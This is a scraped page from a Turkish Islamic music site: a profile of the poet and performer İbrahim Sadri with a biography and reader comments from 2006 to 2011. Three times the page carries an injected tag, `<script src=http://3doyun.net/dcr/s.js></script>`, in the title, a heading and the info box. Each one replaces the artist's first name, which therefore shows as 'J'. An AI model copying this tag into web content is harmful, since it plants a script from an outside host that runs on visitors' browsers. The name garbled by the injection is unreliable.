İslami Müzik Tv
İslami Müzik TV

  Ayeti Kerime
" "
  Hadis-i Şerif
""

J<script src=http://3doyun.net/dcr/s.js></script> Sadri Profili - İslamimuzik.com

    J Sadri Kimdir ?J<script src=http://3doyun.net/dcr/s.js></script> İstanbul’da doğan şair, ilk ve orta öğrenimini burada tamamladı. İstanbul Üniversitesi işletme Fakültesi’nde okuduktan sonra, Yedi yıl tiyatroyla uğraştı. Turnelere çıkarak, Anadolu’yu yakından tanıma imkânı buldu. Çeşitli gazete ve dergilerde yazı ve şiirleri yayımlandı. Radyo ve televizyonlarda programcılık ve sunuculuk yaptı. Halen bir özel televizyonda program yapmaktadır. Şiir ve tiyatro kasetleri de bulunan şairin, şiir kitaplari da mevcuttur.

"Adam Gibi" İbrahim Sadri’nin 1988’den beri devam ettirdiği şiir- kaset serüveninin altıncısı ve kendinden en çok söz ettireni oldu. Aslında kendini bir şair gibi görmüyor ama şiirleri var ve bu şiirlerini yıllardır okuyor. Kendisinin iyi bir şiir okuyucusu olduğunu söylüyor. Eski kasetlerinde de her zaman alışık olduğumuz ’fondaki müzik’, ’Adam Gibi’de oldukça fonksiyonel olarak yer alıyor.

İbrahim Sadri’nin şiirleri belli bir dönemin ruh yapısını eleveriyor sanki.. Bunlar, 60’lı yıllarda doğan, 70’li ve 80’li yılların kargaşa ile sükun arasında aykırı yaşam biçimlerini idrak eden gençlerin birebir karşılık bulabilecekleri metinler. İbrahim Sadri bu dönemin kuşağına ve yaşadıklarına tanıklık etmek istiyor.

İbrahim Sadri tiyatrocu, şair, mizahçı, televizyoncu, stand-upçı vesaire. Ama o kendisini "tiyatrocu" olarak görüyor. Tiyatroyu bırakmasını ise tiyatronun kurumsallaşmamış olmasına ve ekmek kapısı olarak yeterli olmamasına bağlıyor.


Bu Sanatçının Profili 4743 kez ziyaret edilmiştir.

     J Sadri - Yorum Ekle

yusuf demir-MIHCI-
emanet akldıgın şiir hayat hikayesi ve söyleme tarzı sana şöhret getirdi bu hayatı sen hiç yaşamadınki.emeline ulaştın orjinali şiirinde hikayeninde mevcut ama hala bu kişinin hikayeri üzerinden devam ediyorsun kendin olsan daha.
Bu yorum 2011-01-09 17:38:03 tarihinde yapıldı.

fatih Karadeniz
Sayın Hatice Hanım Pratikte haklı olabilirsiniz. Ama yıllarca bu kesimin kanallarında, radyolarında , gazetelerinde vb. yerlerde boy gösterdi. Sizin hangi fikri yansıttığınızı bilemem. Ama bahsettiğim yönün kronolojisine bakarsanız haklı olduğumu görürsünüz. İbrahim Sadrinin bant tiyatrolarını dinlediniz mi? veya ne kadar dinlediniz ki, toplumdan bu kadar farklı düşünüyorsunuz.
Bu yorum 2006-10-01 12:08:33 tarihinde yapıldı.

Hatice Konuk
Sayin Fatih Bey, dikkatinizi asilarak cekerim ki Ibrahim Sadri Islami kesime ait degildi bastan son cikardigi "Birakip Gittigin Kadariz" albumuyle farkli bir dunyaya girmistir.Bilmiyorsak ogrenelim, kimseyi karalamaya hakkimiz yok.
Bu yorum 2006-09-20 17:24:11 tarihinde yapıldı.

fatih Karadeniz
slm. Nerde o eski İbrahim Sadri. Bu yorumu okuyanlara bir soru sormak istiyorum? İslami kesimin müzisyenlerini zaman içinde kaybetmemizin sebebi sizce ne olabilir? Yada onları hiç bir zaman kazanmadık mı? Biz yıllarca kandırıldık mı?
Bu yorum 2006-08-28 23:56:42 tarihinde yapıldı.


Yorum Yapyn

J Sadri

J<script src=http://3doyun.net/dcr/s.js></script>
Genel Bilgiler

Adı: J
Soyadı: Sadri
Doğum Yılı:
Doğum Yeri:
Tarz:
Eğitim Durumu:
Albüm Sayısı: 3
Etiketler:
Websitesi: Resmi Sayfası